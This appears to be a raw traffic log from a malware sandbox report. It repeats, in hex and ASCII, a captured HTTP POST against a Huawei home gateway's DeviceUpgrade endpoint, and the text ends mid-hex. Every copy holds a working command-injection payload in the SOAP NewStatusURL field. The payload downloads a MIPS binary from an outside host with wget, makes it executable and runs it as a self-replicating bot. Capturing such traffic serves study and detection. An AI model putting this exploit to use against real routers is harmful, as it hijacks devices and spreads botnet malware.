65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 